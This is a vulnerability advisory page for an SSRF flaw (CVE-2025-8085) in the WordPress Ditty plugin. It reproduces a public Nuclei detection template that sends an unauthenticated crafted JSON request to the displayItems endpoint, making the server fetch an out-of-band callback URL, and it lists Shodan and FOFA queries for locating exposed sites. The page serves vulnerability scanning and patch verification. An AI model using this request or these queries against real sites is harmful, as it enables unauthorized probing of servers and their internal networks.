CVE-2025-8085: Ditty < 3.1.58 - Server-Side Request Forgery

日期: 2025-08-01 | 影响软件: Ditty | POC: 已公开

漏洞描述

The plugin lacks authorization and authentication for requests to its displayItems endpoint, allowing unauthenticated visitors to make requests to arbitrary URLs. v3.1.57 attempted to fix the issue with a nonce check, however any authenticated users, such as subscriber can retrieve it.

PoC代码[已公开]

id: CVE-2025-8085

info:
  name: Ditty < 3.1.58 - Server-Side Request Forgery
  author: s4e-io
  severity: high
  description: |
    The plugin lacks authorization and authentication for requests to its displayItems endpoint, allowing unauthenticated visitors to make requests to arbitrary URLs. v3.1.57 attempted to fix the issue with a nonce check, however any authenticated users, such as subscriber can retrieve it.
  reference:
    - https://wpscan.com/vulnerability/f42c37bb-1ae0-49ab-bd81-7864dff0fcff/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-8085
    - https://research.cleantalk.org/cve-2025-8085/
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"/wp-content/plugins/ditty-news-ticker/"
    fofa-query: body="/wp-content/plugins/ditty-news-ticker/"
    publicwww-query: "/wp-content/plugins/ditty-news-ticker/"
  tags: cve,cve2025,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,metaphorcreations

variables:
  marker_string: "{{rand_text_alpha(5)}}"
  marker_int: "{{rand_int(1000, 9999)}}"

http:
  - raw:
      - |
        POST /wp-json/dittyeditor/v1/displayItems HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "apiData": {
            "layouts": [
              {
                "id": "{{marker_string}}",
                "html": "{image default_src=\"http://{{interactsh-url}}\"}",
                "css": "{{marker_string}}"
              }
            ],
            "items": [
              {
                "item_id": "{{marker_int}}",
                "item_type": "default",
                "item_value": { "content": "{{marker_string}}" },
                "layout_value": { "default": "{{marker_string}}" }
              }
            ]
          }
        }

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http")'
          - 'contains_all(body, "{{marker_string}}", "{{marker_int}}")'
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100bf756c18ab457c1ec3a7866390cb49bb081549afc1a5da06eacb66b09569874a022100deefb16a6976008fc53f55878bafe9109524e83ee3fc81ff17d076859536cf05:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-8085.yaml

相关漏洞推荐